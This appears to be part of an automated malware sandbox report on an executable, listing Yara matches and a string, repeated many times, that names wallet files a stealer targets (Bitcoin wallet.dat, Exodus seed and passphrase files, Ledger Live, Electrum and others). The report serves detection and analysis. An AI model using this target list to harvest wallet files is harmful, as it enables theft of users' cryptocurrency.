Source: Yara match	File source: 0.3.q27UFusYdn.exe.4410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2177312621.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1631316383.0000000004410000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: q27UFusYdn.exe PID: 6672, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: q27UFusYdn.exe, 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: Jaxx Liberty
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local 